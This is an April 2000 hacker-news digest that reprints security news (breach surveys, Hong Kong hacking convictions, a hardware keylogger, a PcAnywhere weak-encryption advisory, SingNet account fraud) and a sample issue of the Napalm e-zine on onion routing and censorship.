http://www.theregister.co.uk/000406-000023.html ---------- Posted 06/04/2000 3:16pm by Tim Richardson UK PLC leaves door open to hackers - report British companies are too complacent when it comes to Internet security and only have themselves to blame if their IT systems are compromised by hackers. That's just one of the conclusions of a new survey published by the Department of Trade and Industry (DTI) which reveals that two thirds of companies in Britain have suffered security breaches within the last two years. But the survey also reports that most of the losses are under Ł20,000. This is chicken-feed to mega-corporations, and many of them don't take corrective action even after a loss, possibly because fixing the holes would be more expensive than just accepting continuing small losses. Of those suffering a serious security breach 64 per cent said "nothing has changed" since the trespass occurred. Just under half of all security breaches were due to human error. Malcolm Skinner, Product Marketing manager, AXENT Technologies, said: "The report indicates that, to date, businesses have been far too complacent. "In addition to the perils of having your network or Web site hacked, companies must think of the consequences as far as customer trust is concerned. Tom Perrott, Research director, Taylor Nelson Sofres said: "Although there have been some well publicised security breaches, it is generally accepted that those brought to the attention of the public are likely to be the tip of the iceberg. The key findings of ISBS 2000 show that: + 60 per cent of organisations have suffered a security breach in the last two years. + Over 30 per cent of organisations do not recognise that their business information is either sensitive or critical and therefore a business asset worth protecting. + 82 per cent of businesses with external electronic links do not use any firewall protection, and 59 per cent of those with a Web site do not use Web site protection. + Of those organisations that have critical or sensitive information, 63 per cent had suffered a breach that was considered serious to some degree. + One in three businesses are either already buying or selling over the Internet, or intend to start in the near future. + Some good practices are implemented and adhered to by 83 per cent of the organisation interviewed - eg. virus protection and password controls. + Only 37 per cent of organisations interviewed have undertaken a risk assessment where a systematic approach is taken to assess the security risks faced by the organisation. + 40 per cent of companies reporting security breaches were due to operator or user error reinforcing the fact that information security cannot simply be solved by technology alone. + Nearly three quarters of organisations that suffered a breach, which they regarded to be serious, had no contingency plan in place to deal with it. + More than half of the organisations do not believe that there is anything they could have done to prevent the most serious breaches they have suffered. + Only one in seven organisations has a formal information management security policy in place. + Organisations where responsibility for information security rests at board level are those most likely to have formal policies in place. The presence of a formal policy is one of the most important issues in reporting and resolving security breaches. The full findings of the DTI's Information Security Breaches Survey 2000 (ISBS 2000) will be released at Infosecurity Europe 2000 on 11 April at Olympia in London. ® @HWA 189.0 HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles In the first case of its kind in Hong Kong a teenager has been sentenced to six months in jail after pleading guilty to 49 computer crime-related charges. Two other accomplices where sent to detention centers. The trio got to know each other online where they traded name and password information on various accounts. The three have been released on bail pending an appeal. Agence France-Presse - via Nando Times http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html ---------- Teen reportedly Hong Kong's first convicted Internet hacker Copyright © 2000 Nando Media Copyright © 2000 Agence France-Press From Time to Time: Nando's in-depth look at the 20th century Agence France-Presse HONG KONG (April 6, 2000 8:02 a.m. EDT http://www.nandotimes.com) - A Hong Kong teenager has been sentenced to six months in jail for hacking into the Internet in the first case of its kind in the territory, a report said Thursday. Po Yiu-ming, 19, was jailed Wednesday, while two of his companions, Tam Hei-lun, 19, and Mak King-lam, 18, were sent to a detention center after pleading guilty to a total of 49 computer crime-related charges, the Hong Kong Standard reported. It was the first case to be brought before a Hong Kong court after the computer crime laws were enacted in 1994. The trio -- who reportedly got to know each other through surfing the Internet -- exchanged illegally-gained login names and passwords in order to hack into the accounts of Internet subscribers. Magistrate Ian Candy described the three as "intelligent" individuals who could have developed their computer skills for good causes. But Candy said the offenses were serious and they had to be given custodial sentences as a deterrent to others. The trio were released on bail of 10,000 Hong Kong dollars ($1,285) pending appeal. On Wednesday, a system analyst was sentenced to perform 100 hours of community service for unlawfully retrieving tendering data from a government computer system. @HWA 190.0 HNN:Apr 7th:Census Afraid of Electronic Intrusion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench While the US Census Bureau claims that it is doing everything it can to increase responsiveness it has deliberately played down the online option. The Census feels that they have not adequately tested the security options of the site. So while the site is active and available it is not being publicized. (It won't get broken into if we don't tell anyone about it.) Online Census Form Industry Standard - via Yahoo http://www.2000.census.gov/ http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html ---------- @HWA 191.0 HNN:Apr 7th:Hardware Key Logger Introduced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Software to monitor every key stroke has been around for a while but now a New Zealand company has introduced a hardware device that is small enough to be hidden inside the keyboard that does the same thing. The small device known as KeyGhost will monitor and record every key stroke on the keyboard and stores all data within itself. KeyGhost will retail for between $99 and $309. ZD Net UK http://www.zdnet.co.uk/news/2000/12/ns-14347.html ---------- @HWA 192.0 HNN:Apr 7th:Napalm Issue 4 ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Kynik Issue 4 of Napalm has been released with articles on securing Solaris 2.x and musical intonation. (Now that's a weird mix.) Napalm http://napalm.firest0rm.org/ ---------- Napalm is an e-zine devoted to computer security, with a healthy dose of music, news, and ethics. We are committed to helping people understand how to use their computers more securely, while still enjoying the technology and not getting bogged down in lingo. If you feel you have something to contribute, or you need some technical help (professionally or otherwise), don't hesitate to drop us a line. Here's a list of topics I'd like to see covered in Napalm eventually. Email us if you're willing to contribute on these topics or on any other topic of your liking. Issues Issue 4: Securing Solaris, Just Intonation, Music (Apr 5, 2000) Issue 4 Addendum: sol.secure Issue 3: HERF Guns, AI Security, C++ (Jan 31, 2000) Issue 2: Quantum Crypto, VPNs, more gh0st.net (Dec 3, 1999) Issue 1: Onion Routing, gh0st.net, Introduction (Sep 29, 1999) To subscribe, send an email to napalm@firest0rm.org with a subject of SUBSCRIBE. To unsubscribe, same as above, but with a subject of UNSUBSCRIBE. SAMPLE COPY (Issue #1 Sept 99) /\ /^/_ _ __ __ _|^|_ __ ___ / \/ / _` '_ \/ _` | | '_ ` _ \ / /\ / (_| |_) (_| | | | | | | | /_/ \/ \__, .__/\__,_|_|_| |_| |_| |_| Issue 1 (Sep. 29, 1999) ___________________________________________________________________________ The gh0st.net project: http://www.gh0st.net/index.html URL of the day: (Computer geek cartoons) http://www.userfriendly.org All content copyright © 1999 by the individual authors, All Rights Reserved ___________________________________________________________________________ - Editor's Comments - URLs - News - My Life As A Happy Hacker - Onion Routing - The gh0st.net Project - Violence, Censorship, & Our Rights - Future Issues - Credits *********************************************************************** *** Editor's Comments : Kynik *********************************************************************** For now, I'm just going to borrow the layout I used while I was HH editor. (Which I am no more.) I'll try to make it a little bit more freeform than this first issue, but we'll have to see. I'd like to see this zine diverge a little from the standard 'security info' theme and get into music, news and whatever tickles everyone's fancy. Email me at kynik@gh0st.net for damn near anything. Oh, and send me good links, too. NOTE: Due to the gh0st.net webserver and mailserver's owner moving very far away soon, the website may be inaccessible for quite some time. You can contact us at napalmzine@hotmail.com until we get everything back up again. Thanks to TF for actually hosting all the web pages and mail server! *********************************************************************** *** Random good URLs : Kynik *********************************************************************** The Roskilde music festival in Copenhagen, Denmark http://www.roskilde-festival.dk/ The OSKit - build your own OS http://www.cs.utah.edu/flux/oskit/ gh0stOS http://www.gh0st.net/gh0stOS/ Good source code for neural networks http://www.geocities.com/CapeCanaveral/1624/ Irish pop-punk http://www.iol.ie/~brooder *********************************************************************** *** My Life As A Happy Hacker : Kynik *********************************************************************** A long time ago (probably 3-4 years) on a computer lab workstation far, far away (ok, it was the Midwest) I discovered the Happy Hacker in my quest for knowledge of the computer sort. I found it after sifting through search engine results of the keyword 'hacker'. I had been inspired by such movies as "Wargames" and "Sneakers" and realized that there was a lot more to this computer thing than Doom and Microsoft Word. Having realized this, I dove headfirst into the web, trying to find a place that suited my wants and actually had an air of intelligence. Many of the sites I found were crude and obviously created by middle-school-aged kids looking to mess with their friends on AOL. Two things I found caught my attention immediately: Silicon Toad and The Happy Hacker mailing list. I proceeded to download a whole pile of programs from Silicon Toad's site, and played with them on my computer at home, but beyond that, didn't do too much. I checked in on it every once in awhile, until the site disappeared. I kept on getting the happy hacker newsletter, and found out how to do some neat, trivial things such as changing my Windows 95 splash screen for startup and shutdown. Then I began to read about some of the things that people had done with their computers, and against the list founder, Carolyn Meinel. I didn't think too much about this at the time, but kept my interested fascination with the whole 'hacker culture' as I progressed with my Computer Science degree. I continued to receive the digest, and towards the end of 1998, I got a Happy Hacker digest with a request for a new UNIX editor. Having read most of the info out there about Carolyn Meinel and the general consensus about her, I thought about it carefully before I sent in an application. I realized the stigma that currently goes along with CPM and the Happy Hacker name, but after consideration, I thought I'd try to keep alive the idea that got me into the Happy Hacker in the first place: Knowledge and Ethics. Granted, CPM is currently more interested in money and promoting herself than educating and instilling ethics, from what I've seen. I emailed her, and asked if the position was still available. She asked me to write a Guide to (Mostly) Harmless Hacking (GTMHH) on any topic I chose. I chose to write a beginner's guide to C++, since there already was one for C. Well, I sent her a small piece of what I had written, and she advised me that Guide submissions are generally much longer. So I set off to flesh it out and expand on the parts she said were somewhat lacking. I got about 2/3 of the way through it, and grad school and work took precedence. A few weeks later, totally to my surprise, I got an email from Carolyn asking me if I wanted the position. I said yes, we exchanged our PGP keys, I got the passwords to the unixeditor POP account, and I started reading submissions and putting them together to form the Happy Hacker UNIX digest. To see the digests, as they were submitted to Carolyn, go to the following URL: http://fire.gh0st.net/hh/index.html The first few digests were pretty weak, as most of the questions I got were rather bland, and I was still getting the feel of the position. I got very few flames, and a lot of praise. I realized that I might actually be making a difference to some people, trying to help them understand the basics (and some details) of UNIX and computer security. When I heard that Carolyn had moved the HH mailserver over to an AntiOnline computer, I wasn't thrilled, but I really didn't care all that much at the moment. Keydet89, the windows editor, apparently left because of this, which was rather sad, because he always had good perl snippets in his digests. (Send me an email keydet, if you wanna tell about your experience, or write some articles :) Then I thought about it. I looked back at AntiOnline's features section, and I thought about JP's article on "Hacker Profiling". Pieces started to fit together. I thought about the possibility that JP was making copies of any mails that I received as a submission and adding them to his pile of material to be filtered and info to be added to the 'hacker database'. See, a lot of times I'll be sent an email claiming to have broken into a site and wanting to know what to do from there. (Or, someone requests me to break into a site for them -- which I'd consider doing, provided you're paying me and the site is yours.) In the second-last HH digest, I included a link to my PGP key, and an alternate email address that people could write to. I'd say about half of the respondents used the other email address... and 2 or 3 used the PGP key. I realized that I needed a bit more creative freedom, without eyes peeking over my shoulders. So, I teamed up with some people I had met online, and had been working with for a little while, and offered to create a new zine, with an emphasis on computers, security, and music. I wanted to give the people that needed a certain amount of mentoring a chance to get some people to talk to if they needed help. I found out that there was a similar group of people working on a project similar to the Happy Hacker wargames, but cooler, and I started hanging out with them as well. So, here ends my Happy Hacker story. I know I've left out some minor details, but don't worry, they weren't that important. Let's have a big round of applause for the gh0st.net and FireStorm guys! Hopefully the projects will pick up soon, and there will be more to see on both the fire.gh0st.net and www.gh0st.net sites. -Kynikeren *********************************************************************** *** Onion Routing : Kynik *********************************************************************** While it seems that the term "Onion Routing" may be copyrighted, I feel that it is a good description of the technology. Onion Routing is an Internet-based system to prevent eavesdropping and traffic analysis. The name "Onion Routing" is appropriate, since it is based upon adding several layers of encryption to a message (and removing them) as it is passed along the network, as one might remove the layers of an onion. (I suppose one could also call it 'artichoke routing' too ;) This is essential to a network where privacy and anonymity is important. "Well, so what about privacy, everything I'm sending to that site is encrypted with SSL, anyways", you may say. That's all fine and dandy, but chances are, anybody monitoring you knows at least that you've been there, since the destination address is plainly readable in the IP header. That's where the anonymity portion comes in. Someone between you and the website you're visiting is _not_ able to tell (easily) where you're going, or even where you're coming from. There are two notable systems in use/development today (at least what I've initially found). They are: Freedom - "Internet Identity Management System" http://www.zeroknowledge.com/products/ The Onion Router Project (US Naval Research Lab) http://www.onion-router.net/ There are some differences between the two, but I'm not going to analyze them. Now, how does this all work, you ask? The scheme is built upon public-key encryption (of varying strengths) and a 'private' network of routers. Basically, your packet doesn't take the direct route across the net like you'd expect it to. Instead, it is sent to a specialized computer which runs the 'onion routing software'. That 'onion router' (OR) hands the packet off to the next designated OR, which continues to forward it on, until the last OR designated finally delivers it to the true destination. I don't want to get into the mechanics for establishing routes and vendor-specific details like Freedom's Anonymous Mail Proxy, but instead I will explain the generic mechanism that allows you to send anonymous, private traffic across the internet via onion routing. A fairly good paper, by Goldschlag, Reed and Syverson, entitled, "Onion Routing for Anonymous and Private Internet Connections," does a thorough job of explaining this technology: http://www.onion-router.net/Publications/CACM-1999.pdf From the paper: Onion Routing operates by dynamically building anonymous connections within a network of real-time Chaum Mixes. A Mix is a store and forward device that accepts a number of fixed-length messages from numerous sources, performs cryptographic transformations on the messages, and then forwards the messages to the next destination in a random order. A single Mix makes tracking of a particular message either by specific bit-pattern, size, or ordering with respect to other messages difficult. By routing through numerous Mixes in the network, determining who is talking to whom becomes even more difficult. Onion Routing's network of core onion-routers (Mixes) is distributed, fault-tolerant, and under the control of multiple administrative domains, so no single onion- router can bring down the network or compromise a user's privacy, and cooperation between compromised onion-routers is thereby confounded. Freedom's system might be slightly different in implementation, but again, I'm ignoring details, and loving every minute of it! When a specific message needs to be sent through the onion-routed network, several layers of encryption are placed on the message, along with sufficient information to describe the path on a step-by-step basis. This way, each onion router along the way uses its own public key to decrypt the whole 'onion', at which point it recognizes the next onion router in the route, and forwards the partially-decrypted message to it. When the enveloped message eventually reaches the final onion router, it is decrypted to cleartext, and the message is passed to the destination, not too differently from if the source host had simply connected in the clear over the Internet, except for the fact that it was made virtually untraceable for the duration of its trip from end to end. Feel free to send me questions and commentary on anything I may have screwed up (or done well). kynik@gh0st.net *********************************************************************** *** The gh0st.net Project (Part 1 of 2): Phatal *********************************************************************** Gh0stnet in its simplest and most basic form is a security model. As a security model, gh0stnet's integrity is maintained by the fact that it protects access, whether this be access to data or some other resource makes no difference. Complication occurs when we examine gh0stnet's purpose. The theme is not necessarily to provide an ultra-secure network... it's simply to provide security. Whether the provision of security is done well or even in a rational manner is up to us as developers. Further complicating this matter is the concept of providing a security challenge or novelty to the public. Are we targeting a specific group of people to benefit from gh0stnet? As far as I'm concerned, no. While we are all obviously aware that gh0stnet's existence specifically caters to a certain type of computer user, there's been no real intention to do so. By virtue of not being funded by a corporation or the government and also by the virtue of being conceptualized by someone who spends the better part of his day immersed in computer security, the compsec underground will inevitably be an integral part of gh0stnet. Hopefully this will be one of its greatest assets. Although the physical establishment of gh0stnet is still in the works, I have a feeling that's going to be the easy part. I'm putting energy into gh0stnet with the intention that it will long surpass my interest. As a field of study and a science, computer security is an evolving subject. If gh0stnet is to ever provide anything substantial to its public, it will have to reflect this. Development: This is the area that gh0stnet should be the most active in. If there's one thing I hate it's purposeless work. What I hate more than purposeless work is being bored. From my perspective, I would prefer to do more than set up a number of boxes to let people hammer into the ground. It would be fun to look at the logs for a while, but ultimately it would become boring. I'm interested in using gh0stnet as a testbed for alternative, ingenuitive, and challenging security concepts. This would provide tons of fun for us, something interesting to give to the users besides boxen to break into, and more than likely create some very interesting offspring. Software or hardware, it's all a matter of what contributions we as individual developers have to offer. Participation: This is an area that I tend to give a lot of thought to. As "developers" we really do more than just develop. We maintain and administer gh0stnet. This is not a job. Participation is totally interest-based. I'm not one to force people into doing something that they don't want to. If it appears that the role you're taking in this project is not quite what you want or what you expect, it's important that you speak up. I sacrifice a lot of my free time for this but I don't neccessarily expect others to. The project does have a well-defined vision/goal that I may be relatively inflexible about, but not unapproachable. What I will be very wary of is the inclusion of other individuals outside of my sphere of influence. This is a delicate project from my standpoint, so I'm a little touchy as to who deals with it. To have one person on board who doesn't quite see the goal or has some other motives besides the prosperity of gh0stnet would have a negative impact on the project. Stating this here serves no other purpose than for you folks to be aware that I want a shiny, happy, rosey environment in which I deal with people who I know and trust. Not that I don't like contributions, but network management and planning should pretty much be kept between us developers. The most important part of getting this off the ground will be the communication that goes on between all of us. Hopefully most of the communication will be occurring on the gh0st.net box, courtesy of TF. Toxy has also been threatening to start a mailing list and that sounds kick ass to me. Natas, kp2, and I live in the same state and hopefully we'll all be getting drunk together soon ; ). *********************************************************************** *** Violence, Censorship, & Our Rights : Blakboot *********************************************************************** [Editor's note: I've taken the liberty to publish this article by Fire Storm's founding member in his absence. This article was (and still is) available at . It has not been edited from its original form, except for formatting to fit the page, and minor spelling corrections.] To most of the people whom will read this, I have no credibility - why should you listen to me? Well, because if you read any farther, I'm sure you will find that I'm not writing about anything extreme; these are our rights. Recently, in retaliation to school violence, people are working to suppress information pertaining to explosives; keep it out of the hands of youngsters. Although, this movement is not focusing on just that, rather make an exception to our rights, and quiet what we don't want people to hear. You see, this country is based on tolerance. Some may be prejudiced, but we as a whole, in this country, don't just go off destroy the minority. We tolerate it, because if one day our rights are threatened, we can count on other people to fight with us. It's about power of people, and not everyone can get what they want - so we must be tolerant, even if we don't totally agree with it. The movement is contradicting itself. People want to educate the masses into an objective whole, yet want to shut out information, and take the philosophy, "Ignorance is bliss". We should work towards happiness, because anyone can learn to KILL; bombs, guns, knives, etc. are beside the point. People kill because of many reasons, and "now they can" isn't it. The general public is quick to say that bombs, guns, and "outcasts" are the reason for this school violence problem. Wrong. Students don't kill just because they _can_, it's because, perhaps they're miserable? Perhaps they're implementing the violence many students just think about? My opinion is yes; I've even tempted to say majority by far think about violence as an outlet. "Wackos" just don't think about violence; everyone does and sometimes we actually do what we plan. I'm not trying to justify what these people do, but I'm saying this isn't just some isolated cases. Something is wrong. I personally think it's new presures in society today and the school enviroment. Keep in mind that the basic idea/concept of how school works has never changed. This "concept" isn't education, it's the enviroment, which is stressful and obviously causes violence. You may say something to the effect, "Stress is a natural part of life". I agree with you, but these are CHILDREN we're talking about, and they obviously can't cope. Back on the subject of unalienable rights. If we make an exception, we'll find ourselves taking away our own rights, _one_by_one_. There is NO exception, these are our RIGHTS! There will always be someone you disagree with, but you'd better respect THEIR freedom, if you want them to respect YOUR freedom. Because one day, your thoughts may not fit in with the majority. End points: People in the Untied States of America have the right of press; we can write about anything and everything. If you dont like it, leave. See how other goverments deal with these things, and tell me how much you hate liberalism. Leave and go to a country where you can't say jack, and tell me how much you'd like to shut up those boisterous protestants. This issue isn't something new. Censorship itself is an exception we've made, and it's wrong. *********************************************************************** *** Future Issues *********************************************************************** The gh0st.net Project (Part 2 of 2) : Phatal Creating Restricted ("Sandboxed") User Accounts : Fict *********************************************************************** *** Credits *********************************************************************** Editor: Kynik Co-editor: Ajax Article Contributions: Phatal Blakboot *********************************************************************** *** Subscription *********************************************************************** To subscribe to this 'zine: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of SUBSCRIBE To unsubscribe: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of UNSUBSCRIBE Submissions, questions, comments, and constructive chaos may also be directed to kynik@gh0st.net, napalmzine@hotmail.com or any of the contributors *********************************************************************** @HWA 193.0 HNS:Apr 8th:NEW KIND OF SECURITY SCANNER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Saturday 8 April 2000 on 3:33 AM ISS is offering an on-line scanner for Web sites which surveys users' hard drives to detect any potentially dangerous programs, such as Trojans and viruses, that may have been placed on the machine without their knowledge. Link: The Register ____________________________________________________ http://www.theregister.co.uk/000407-000033.html ---------- Posted 07/04/2000 8:17pm by Thomas C. Greene in Washington New Web site security scanner will read your HDD Internet Security Systems (ISS), is offering an on-line scanner for Web sites which surveys users’ hard drives to detect any potentially dangerous programs, such as Trojans and viruses, that may have been placed on the machine without their knowledge. The ISS Online Scanner will automatically test individual computers, identify security weaknesses, and provide users with easy-to- follow instructions for fixing security problems. It looks at the overall configuration of a computer and recommends changes that can help prevent unwanted intruders from reading or changing sensitive personal files or from enabling an attacker to use the computer as a 'zombie' machine to launch more broad-based Internet attacks. "The importance of offering scalable security management solutions to companies that want best-of-breed technology is critical to the success of protecting the Internet economy," ISS Vice President of Enterprise Software Keith Cooley said. "It is imperative that organizations can easily implement the processes and technologies needed to automatically monitor and respond to security risks. As the industry’s leading trusted security provider, ISS is strengthening our unique security software platform to ensure safe and uninterrupted e-business for our customers worldwide," he crooned. The ISS application will use Active-X technology to scan a visitor's machine and wipe out any undesirable code. The company acknowledges that use of scanning applications by Web sites could be controversial. But we don't see much of a problem with it. Sites that offer it as a free, voluntary service will do themselves and their customers a favour. Sites foolish enough to require it as a condition of visiting or doing business will find themselves paying a heavy price in gross revenues, as the vast majority of Web surfers are sure to be repelled by it. 'Market forces' should be adequate to keep this a relatively harmless little gimmick. ® @HWA 194.0 HNS:Apr 8th:WAYS TO ATTACK ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Saturday 8 April 2000 on 3:32 AM Following recent high-profile Web security breaches, Enstar, an e-security firm, hosted a live demonstration in San Antonio Friday to show the many ways hackers break into systems. Link: CRN ____________________________________________________ http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID ---------- Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '='. /templates/sql_createarticle.asp, line 24 Cool. thanks. @HWA 195.0 HNS:Apr 7th:STOLEN ACCOUNTS ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 6:50 PM "Malicious hackers" from overseas have been racking up surfing bills for unsuspecting SingNet customers by using their Internet accounts, The Straits Times has found out. Link: The Straits Times ____________________________________________________ http://www.straitstimes.asia1.com/singapore/sin20_0407.html ---------- APR 8, 2000 Overseas hackers using SingNet accounts to surf They are racking up bills for customers by using the global-roaming facility. SingNet devises a counter-strategy By STEVE DAWSON "MALICIOUS hackers" from overseas have been racking up surfing bills for unsuspecting SingNet customers by using their Internet accounts, The Straits Times has found out. The hackers, many of whom have been traced to Thailand, take advantage of a facility called global roaming, provided by SingNet. The facility allows users who travel overseas to call up a service provider there to connect to SingNet, so they save on IDD charges. The number of complaints from customers who said their accounts have been used by other people peaked at around 50 a month in November and December, said SingNet's product development manager, Mr Lee Wan Fei. SingNet, which has a 260,000 customer-base, sees the cases as fraud and have referred them to the police. Most cases seem to involve students, who use chatrooms or instant-messaging services regularly. Here, passwords can either be detected through Trojan-horse viruses installed on the hard drive through files sent via e-mail or lapses in personal security, like giving your password to other people. Overseas surfers who obtain passwords fraudulently are then able to log on to the Net using an account belonging to a SingNet customer. This unauthorised use raises the customer's bill. SingNet declined to say how much money was involved. Contractually, SingNet's customers are responsible for all usage on their accounts. But Mr Lee said: "On a case-by-case basis, with adequate proof provided by the user, we may consider offsetting part of the bill for them." SingNet has launched a two-pronged counterattack. It will, from Tuesday, allow users to disable the global-roaming service, which, at present, cannot be disabled. Secondly, when SingNet detects use of the global-roaming service on an account, the account-holder will be automatically notified. Mr David Berryman, SingNet's "abuse-master", is working closely with the Criminal Investigation Department on the cases. He said surfers can also play their part by keeping their passwords secure and downloading the free security software available to SingNet subscribers at www.singnet.com.sg/customer/abusetools/ @HWA 196.0 HNS:Apr 7th:JAILED FOR SIX MONTHS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 6:48 PM Po Yiu-ming, 19, who was among the first three hackers to be convicted since computer crime-related laws were enacted in 1994, was jailed for six months yesterday. Link: SCMP ____________________________________________________ http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp ---------- Thursday, April 6, 2000 Computer hacker jailed for six months ELAINE PAK LI -------------------------------------------------------------------------- ------ A shy teenager who became a computer hacker to find "satisfaction and achievement" was jailed for six months yesterday. Clerk Po Yiu-ming, 19, who was among the first three hackers to be convicted since computer crime-related laws were enacted in 1994, turned to crime because he was a social outcast, a court heard. Restaurant manager Tam Hei-lun, 19, and student Mak King-ming, 18, were both sentenced to a detention centre for similar offences. The trio, who had earlier pleaded guilty to a total of 49 computer crime-related charges, appeared before Eastern Court magistrate Ian Candy yesterday. Po's lawyer, Wong Man-kit, said the clerk suffered asthma and a skin disease, which had isolated him from classmates. Gradually he became an introvert with low self-esteem. "He then became interested in computers and was obsessed . . . He got a sense of achievement and satisfaction from such offences," Mr Wong said. Barrister Thomas Chan, for Tam, suggested a community service order so the restaurant manager could be punished and rehabilitated at the same time. Tse Hon-yuen for Mak, said the student, who was sitting his A-levels, was now "aware of the responsibility of his foolish act". But Mr Candy, who described the three first offenders as "talented and highly intelligent in computer skills", said they had caused "great damage and loss to society and the economy". "Each of you are well aware that the things you do are dishonest and wrong. Your offences have even alarmed legitimate Internet users. "The court must give a clear message that these offences must be given a deterrent sentence. "Even though each of you have clear criminal records, come from good families and are in every other way talented, the only sentence to impose is an immediate custodial term," Mr Candy said. The court has heard Po had illegally obtained 127 login names and passwords, given to Internet users when they subscribe to a service provider for a monthly fee and an hourly rate. The trio got know each other through the Internet and exchanged the login names and passwords and hacked into a number of user accounts. Mak had also downloaded songs from the Internet and sold them on discs without the publishers' authorisation, the court had heard. Tam wept as he was sentenced while the other two remained expressionless. The trio applied for bail pending appeal and were released on $10,000 bail. Detective Senior Inspector Fung Wai-keung of the Computer Crime Bureau, who was in charge of the case, described the sentences as "appropriate." "Illegally obtaining login names and passwords and selling them for profit is just one of many computer related crimes," he said. "The precedent set today is a good example to show to the international community that Hong Kong will never allow such crimes in the information technology field. "We are not going to let such crimes affect the local electronic trade and its reputation," Inspector Fung added. @HWA 197.0 HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 4:27 PM PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and password are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their password are sent with weak encryption. Link: Bugware ____________________________________________________ http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342, ---------- PcAnywhere weak password encryption Posted to BugTraq on 7.4.2000 PcAnywhere 9.0.0 set to its default security value uses a trivial encryption method so user names and password are not sent directly in clear. Since most users have the encryption methods set to either "none" or "PcAnyWhere", their password are sent with weak encryption. A major concern lies in the fact that PcAnywhere can authenticate users based on their NT domain accounts and passwords. When the user logs on, it is prompted for its NT username and password. They are then "encrypted" through the PcAnywhere method and decrypted by the host computer for validation by the NT domain controller. Someone snooping on the traffic between the two stations will unlock both the PcAnywhere and NT account. All that without even having to go through the L0phtCrack process. Version 7.0 is not at risk since no encryption is used at all. Username and password are sent in clear. I haven't tested version 8 yet. --- Solution --- Symantec says that this was not intended to be real encryption and suggest the use of the Public or Symetric key option instead. More info can be found at : http://service1.symantec.com/SUPPORT/pca.nsf/docid/ 1999022312571812&src=w @HWA 198.0 HNS:Apr 7th:NET PRIVACY TOOLS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 3:46 PM Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal. Link: CNET ____________________________________________________ http://news.cnet.com/news/0-1005-200-1655289.html?dtn.head ---------- Microsoft plans free Net privacy tools By The Associated Press Special to CNET News.com April 7, 2000, 4:50 a.m. PT TORONTO--Microsoft promised free Internet tools based on emerging privacy standards for controlling how much information people using the Web reveal. Coming from the world's largest software company, the tools could give impetus for Web sites and other companies to embrace the Platform for Privacy Practices, or P3P. The World Wide Web Consortium, an Internet standards group, may finalize P3P this summer. Richard Purcell, Microsoft's chief privacy officer, said the tools will help consumers better understand how sites track visits and pass along information to other parties. A formal announcement is expected in a few weeks. Purcell disclosed the company's intent during an interview yesterday at the Computers, Freedom and Privacy conference here, meeting through today. People using the Internet are increasingly concerned about Web sites that create profiles of email addresses, favorite books and clothing sizes for marketing purposes. Sites often disclose their intent in privacy statements that are difficult to find and understand. The Microsoft tools, to be released this fall, will translate such statements into machine-readable form and let Internet surfers block access to sites that collect too much. With the software, people using the Web can state what types of information they are willing to give, as well as whether they mind sharing that information with outside parties. Internet surfers will receive a warning before visiting sites that go beyond that level. Microsoft plans to make the tools for its browser, Internet Explorer, and for the competing Netscape browsers. Lorrie Cranor, who heads a P3P Lorrie Cranor, chair of the P3P specification working group at the W3C, discusses the proposed privacy standard. working group, considered Microsoft's decision important, saying, "In order for P3P to be widely used, there has to be good user software available. "The question I always get is, 'Is Microsoft going to implement it?'" she said. Still, critics believe Web sites won't have incentives to join, rendering such tools and standards meaningless. Jason Catlett, president of Junkbusters and a critic of P3P, said wide adoption remains years away. @HWA 199.0 HNS:Apr 7th:SECURITY ADDITIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 3:45 PM Cisco Systems next week plans to ramp up its VPN security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users. Link: InfoWorld ____________________________________________________ http://www.infoworld.com/articles/en/xml/00/04/06/000406enciscofirewall.xml ---------- Cisco plans firewall addition for small businesses By Cathleen Moore CISCO SYSTEMS NEXT week plans to ramp up its VPN (virtual private network) security with a new addition to its PIX firewall line as well as an updated version of its Secure Policy Manager software for enterprise users. The Cisco PIX Firewall 506 will bring a low-end offering aimed at small businesses and branch offices to the company's existing firewall set. Other products in the family include the PIX 515, targeted at small and midsize enterprises, and the Secure PIX 520, which is designed for large enterprise installations. With its newest firewall member, Cisco is attempting to tap into small business environments, which -- with increasing reliance on the Internet -- are seeking more powerful security solutions for remote access technologies and VPN. About the size of a hardback, the PIX 506 can handle throughput of 10Mbps and 3DES encryption at rates of 4Mbps, according to Cisco. The 506 firewall holds a 200MHz Intel Pentium III processor, 32MB of RAM, and two integrated Fast Ethernet ports. 